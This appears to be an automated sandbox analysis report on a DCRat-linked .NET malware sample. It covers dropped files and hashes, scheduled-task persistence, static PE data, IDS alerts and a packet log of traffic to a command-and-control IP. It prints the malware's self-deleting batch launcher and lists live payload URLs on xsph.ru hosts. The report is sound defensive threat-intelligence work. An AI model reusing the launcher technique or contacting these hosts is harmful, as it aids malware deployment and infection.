Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:07:00	API Interceptor	4x Sleep call for process: wRRcPdViqk.exe modified
12:07:00	Task Scheduler	Run new task: wRRcPdViqk path: "C:\Windows\Media\Sonata\wRRcPdViqk.exe"
12:07:00	Task Scheduler	Run new task: wRRcPdViqkw path: "C:\Windows\Media\Sonata\wRRcPdViqk.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.8.192.103	RlwD08ogvR.exe	Get hash	malicious	DCRat	Browse	a0992844.xsph.ru/autohotkey/autohotkey.exe
	eI1kuK1l6m.exe	Get hash	malicious	DCRat	Browse	a0992844.xsph.ru/autohotkey/autohotkey.exe
	http://a0988288.xsph.ru/yoyo334/yoyo322/adobe-home/login.html?log=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveL&log2=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveL	Get hash	malicious	Unknown	Browse	a0988288.xsph.ru/favicon.ico
	nMbRell419.exe	Get hash	malicious	AsyncRAT, GMiner, Quasar	Browse	a0920080.xsph.ru/miner.exe
	2ctyhHi7vb.exe	Get hash	malicious	AsyncRAT, GMiner, Quasar	Browse	a0920080.xsph.ru/miner.exe
	Ginb1xVyuO.exe	Get hash	malicious	LummaC, Clipboard Hijacker, LummaC Stealer, SmokeLoader	Browse	a0915052.xsph.ru/logo.jpg
	HUHL9Pu9WY.exe	Get hash	malicious	Unknown	Browse	a0902054.xsph.ru/one.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINTHOSTRU	ezes5Xm24s.exe	Get hash	malicious	DCRat	Browse	141.8.192.93
	LisectAVT_2403002A_442.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	wdOEfoZ2zn.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	LPpeVU2rxe.exe	Get hash	malicious	DCRat	Browse	141.8.192.6
	8E16230A9D5336FB1D6C6278B45E3B653AA2F6CD060742F28CD68D6A5117A396.exe	Get hash	malicious	Bdaejec, DCRat, RedLine	Browse	141.8.197.42
	88YW43jlqt.exe	Get hash	malicious	DCRat	Browse	141.8.192.103
	https://sites.google.com/view/intelvest?fJcurFFemrY/home?fVJiBoRTHSMKWyVNNJkTPZNgolCtN?authuser=2?exyFFKRYcyzAMCsLkcrkWlGrYRNgWcZSZN	Get hash	malicious	Unknown	Browse	141.8.192.163
	oiO6P0pw3g.exe	Get hash	malicious	DCRat	Browse	141.8.192.103
	WaGEjB6fXN.exe	Get hash	malicious	DCRat	Browse	141.8.192.103
	DeqcE30sLb.exe	Get hash	malicious	DCRat	Browse	141.8.192.151

Process:	C:\Users\user\Desktop\QT4aLb3P98.exe
File Type:	JPEG 2000 image
Category:	dropped
Size (bytes):	364
Entropy (8bit):	5.78079638371775
Encrypted:	false
SSDEEP:	6:c+POvC1v4Sxk+uXusxM1pP7+tWIqoKtP7Y7SNFxshSL1xC0HAfHae/rbn:QvmVuXuP17+tWKYM7SNFxshS5wKz+n
MD5:	B72F5918C2918A9BCBF3933B80CB807F
SHA1:	A283EB6B8F0B470A1453A4B449A41732D8F95C87
SHA-256:	2B8F3A20F33BFD2831DCD7C79AD31CFF861A05A199390DE9DEF1E0E3288B5DFF
SHA-512:	31449758527E374D24A03A94CBA91A72EFDD63AB34DA1217DE89614B2DE370C80193B2882C3166EFDCA9F42C26CC703BEBE593405690894E3FCB705785BC46BB
Malicious:	false
Reputation:	low
Preview:	pzsyjPnAr6dpOPHaNjGibZj0hR7WTEZ3NyskMnAJhCD0K87z5UxrZd4PQ1RSSRrnhkbaghNki6AZVsqjTIa8Qrdu4dTUWs0QUaTjghSYGNJdce4iLr9K1tWzGrgDN2N0GuF4ZGDvzB1CiARZivJospYkEddyBOKO9SWsY9IEoNVz1TRFZGecsjHaWe06nOuk1nDQnjAjnFAfUjtvMXY4tsfaK5W4JMaZdu8OQBb0G5znimGwvEuQz00IImFsNGZaokCjlffK5ixy311izjJEcKkm3zFn6tnAgY88jgLPjjURCCPQug2o7U8eAZqwZ1OL5xRe338SX3f20Tk1jz3Z19CLZd8K0Z0sUIWOuvW1hkQE

C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe

Download File

Process:	C:\Users\user\Desktop\QT4aLb3P98.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1170944
Entropy (8bit):	6.845815804782972
Encrypted:	false
SSDEEP:	24576:10ybzboC40b/IwQSETTrn/BBhA/nJTbEHzsS/:10ykC40nEIdSzs
MD5:	1A9C19CD373F9CE0642F18F6965521B3
SHA1:	64BC66F217964AB7310084CC9B2E4EF72EA7156B
SHA-256:	82BEA7C0254A8A0B675F8702EB3DAFBBCC608BDB672738D159B33AE699A4D5BB
SHA-512:	3B68254D3425E45F2D28DBDF0507FE723EA4EF493C33707FB94EA23D30E59AD63C8BA30D7EFC3102D88BDA70D60AB3895F2E8DCDD9383260EF3807AFD6CF2349
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\QT4aLb3P98.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QT4aLb3P98.exe.log

Download File

Process:	C:\Users\user\Desktop\QT4aLb3P98.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
MD5:	FE86BB9E3E84E6086797C4D5A9C909F2
SHA1:	14605A3EA146BAB4EE536375A445B0214CD40A97
SHA-256:	214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
SHA-512:	07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wRRcPdViqk.exe.log

Download File

Process:	C:\Windows\Media\Sonata\wRRcPdViqk.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.366581410225247
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4j:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAM
MD5:	289874BC03B0CB1B73F95A44E23B84A5
SHA1:	F275F15181639F5CF9D17D52B662078C7982BBE1
SHA-256:	0848F9D75F9CB57CB8505936C8D1806D4140BEFE2B169CD022ED97A6094B3F6F
SHA-512:	227F67091FEF053586FA6DE1BA1FC2AD7631694401727C3A9F53ABBA6B46574EE72612827CBE91A39AD55EE5B5FE9286E7B54DD8262D6B35B0FE3ACBE24697B4
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat

Download File

Process:	C:\Users\user\Desktop\QT4aLb3P98.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	203
Entropy (8bit):	5.170738904551695
Encrypted:	false
SSDEEP:	6:hITg3Nou11r+DEgoRZ32L5KOZG1wkn23fb1:OTg9YDEgoH2Nfx
MD5:	B909BC083B6775FE75AC2A8FEE157D95
SHA1:	E64410F45EF4FAE36F32541C6AEE5C39E5C6CBA1
SHA-256:	23694B503A80A5ACA506B8A82BD5EE93417A6F6AF34ECCA1D284E72356E63B3A
SHA-512:	1200FEFCE28B201822F7D68FFF451015764B4E91C7DA969DD6812071802DFFD656D53F3DFA46D6159D49A2EF54579C0005203140A9969466036F65963817DAAD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\Media\Sonata\wRRcPdViqk.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\eE9QbXcUOX.bat"

C:\Users\user\AppData\Local\Temp\wLOamAKQX5

Download File

Process:	C:\Users\user\Desktop\QT4aLb3P98.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:fmf3Uiz:esiz
MD5:	A8EE9A13197B53C09E2971824B5B0F56
SHA1:	3C5A95164F897B41F6087EEDE1BB35BF19266E76
SHA-256:	FE41ACF392B5B3D0938E2DEE5E906D9CF8536B39ADA642FDE91D3A656139723D
SHA-512:	1D64DF133368048E60B88BB65849BFB4835675EAF4F37705B4652744BC98B7D99E4C8E462ADEF2A5E4EC370330542E1AB3D1055FE60372B5511379573D0E86DC
Malicious:	false
Preview:	WBYXZur1SNnFQDypXp8YNGuR5

C:\Windows\Media\Sonata\62cf92e5da7ec3

Download File

Process:	C:\Users\user\Desktop\QT4aLb3P98.exe
File Type:	ASCII text, with very long lines (790), with no line terminators
Category:	dropped
Size (bytes):	790
Entropy (8bit):	5.905449615960063
Encrypted:	false
SSDEEP:	24:Ifrv0AnYWLgjpOF07J4P/QMUzacD8MhPI:ID8EepAIJ3bGcDbw
MD5:	A030D9F1E62A07596E7A08764A70BE6B
SHA1:	6EA64EF5FC49756DAC289058BDC273F35DBC0569
SHA-256:	3963790534692A4FC930680D8BF7130420B4A520FF1768F57EE9A67F8FAAECB6
SHA-512:	418372CE537A7D1B24A184565D6494EEA7C4BDB240BE60C67DE6B1C1D2D43EF592A35B53751A840E504BC71248B859429A1A7789910CF10B170C550EF05B8C82
Malicious:	false
Preview:	ir7VGydC1Qt8WUzRVBMQufxadoq66tIRBCh6tdsYG57DMvtujndawwCD4h2cHgFIIb7Ux3h1TxJyitNr45WSQrfP9eBMlQQkzy5vyZ7qFlG8mNeKTKhMJx2a6rUT1VQDgj8tyb3f8qMplgnw912bsEaC6eyGEoyuUDcCOvW2RBNdkNzaEiTAczUbI6wUmwaT2cUiDkhNeAKq07btoYBgUxRfsA4S8CPel3lI2RWeAGgbpokKeCpOu39EKy0CpOOcvpF7WT0XBhgOR00Eaty5WBtr4g7EaUyw1Dq9inyKMRMNXvwU7vm6aSGu5YCzWv6rtuXOJ1fw5ntEzgTJtnHpr2Vi76DKk8yaVeenYiKGQzBxjB4ZE3FtoR90YyRNxVL6yTtUCqvLcBY20h96BoFr2FvDenPjR7S4nE9PRkWXH4Qn2HA0zUMJPeDsiq0ZbM4esePwitobRrj8yHKXnYt6vIoJAQrlt765Aw5Y1NRGqu2h4F3afdvCc7tjzGvSCDrTvo8CMwfZGnQAQGO5WRFQL3dCDVivc9EmCjwQH1Nt7W6zrsTt105u8bH1L591Nu7Hjn7rT8yfDWSz7nVVBz3lDTolb5FL2WfNYyPDumZ3BarmJS3hjozY0VEQ9WPY3mnr0EaJYSkZZAkmlCbJBilNgHXDu9DXWA9Yx9vF1uIRDa8zvbo75FWVAZLtqXYYOMCZALzmQVRQZUKGIiRSVGcQnoXYyBZeVuC0XjykmCqjyG5qOElIFGDIuvvWxaxP6x5pSTsjtrqTa3chsrJtaRZPq4

C:\Windows\Media\Sonata\wRRcPdViqk.exe

Download File

Process:	C:\Users\user\Desktop\QT4aLb3P98.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1170944
Entropy (8bit):	6.845815804782972
Encrypted:	false
SSDEEP:	24576:10ybzboC40b/IwQSETTrn/BBhA/nJTbEHzsS/:10ykC40nEIdSzs
MD5:	1A9C19CD373F9CE0642F18F6965521B3
SHA1:	64BC66F217964AB7310084CC9B2E4EF72EA7156B
SHA-256:	82BEA7C0254A8A0B675F8702EB3DAFBBCC608BDB672738D159B33AE699A4D5BB
SHA-512:	3B68254D3425E45F2D28DBDF0507FE723EA4EF493C33707FB94EA23D30E59AD63C8BA30D7EFC3102D88BDA70D60AB3895F2E8DCDD9383260EF3807AFD6CF2349
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 84% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Media\Sonata\wRRcPdViqk.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\QT4aLb3P98.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.696309224034796
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXgKtRlVXLV7yXKvpH6FAHKvj:Vx993DEUctRspGs
MD5:	48E22C3295CCDFF382E18BC5673C33FF
SHA1:	EEB3C9A726350676AD785CA5EBBD16A3FA53D97E
SHA-256:	4B377F2768B7812FC474538F5576A156B3917107EA9B15152EFD72A12317CE45
SHA-512:	41A13F61939E7AAE323B7D4CAFF2B94C27F5AF30DBE9D6143E410C98E61EDC97F47018D6A3AB9590CA857C7420B8B19F702F4C7347C55485AC9B63627AE39D1D
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 27/07/2024 08:08:02..08:08:02, error: 0x80072746.08:08:07, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.845815804782972
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	QT4aLb3P98.exe
File size:	1'170'944 bytes
MD5:	1a9c19cd373f9ce0642f18f6965521b3
SHA1:	64bc66f217964ab7310084cc9b2e4ef72ea7156b
SHA256:	82bea7c0254a8a0b675f8702eb3dafbbcc608bdb672738d159b33ae699a4d5bb
SHA512:	3b68254d3425e45f2d28dbdf0507fe723ea4ef493c33707fb94ea23d30e59ad63c8ba30d7efc3102d88bda70d60ab3895f2e8dcdd9383260ef3807afd6cf2349
SSDEEP:	24576:10ybzboC40b/IwQSETTrn/BBhA/nJTbEHzsS/:10ykC40nEIdSzs
TLSH:	C2454A027E44CE11F0191233C2EF498857B4AC516AA6E72B7DBA377E95123A77C0D9CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb.....................6........... ........@.. .......................`............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x51c3be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x11c370	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x122000	0x218	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x124000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x11a3c4	0x11a400	95a8c6c08aefc3130933a63b468baaa1	False	0.6445537394818424	data	6.880883233546267	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x11e000	0x2fdf	0x3000	997f8f1585a016050a8274e34a6ef121	False	0.3102213541666667	data	3.2429490603203397	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x122000	0x218	0x400	016b58abee1039e0fd05d3da17d2216f	False	0.26171875	data	1.8344366501290008	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x124000	0xc	0x200	986ee7562de512fa3cbf6a1213d12113	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x122058	0x1c0	ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970	English	United States	0.5223214285714286

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T13:07:02.639541+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49730	80	192.168.2.4	141.8.192.103
2024-07-27T13:07:19.875048+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49731	20.12.23.50	192.168.2.4
2024-07-27T13:07:26.259809+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	56108	20.12.23.50	192.168.2.4
2024-07-27T13:07:27.325367+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	56109	20.12.23.50	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 13:07:01.948612928 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:01.953556061 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:01.953653097 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:01.954128981 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:01.958942890 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.639342070 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.639460087 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.639477015 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.639540911 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.639878988 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.639898062 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.639933109 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.640713930 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.640729904 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.640762091 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.641463041 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.641480923 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.641515970 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.642442942 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.642499924 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.646575928 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.647041082 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.647058010 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.647114992 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.754640102 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.754659891 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.754678011 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.754863024 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.755534887 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.755739927 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.759516001 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.759532928 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.759615898 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.760658026 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.760679960 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.760832071 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.764633894 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.764652014 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.764666080 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.764710903 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.765642881 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.765661001 CEST	80	49730	141.8.192.103	192.168.2.4
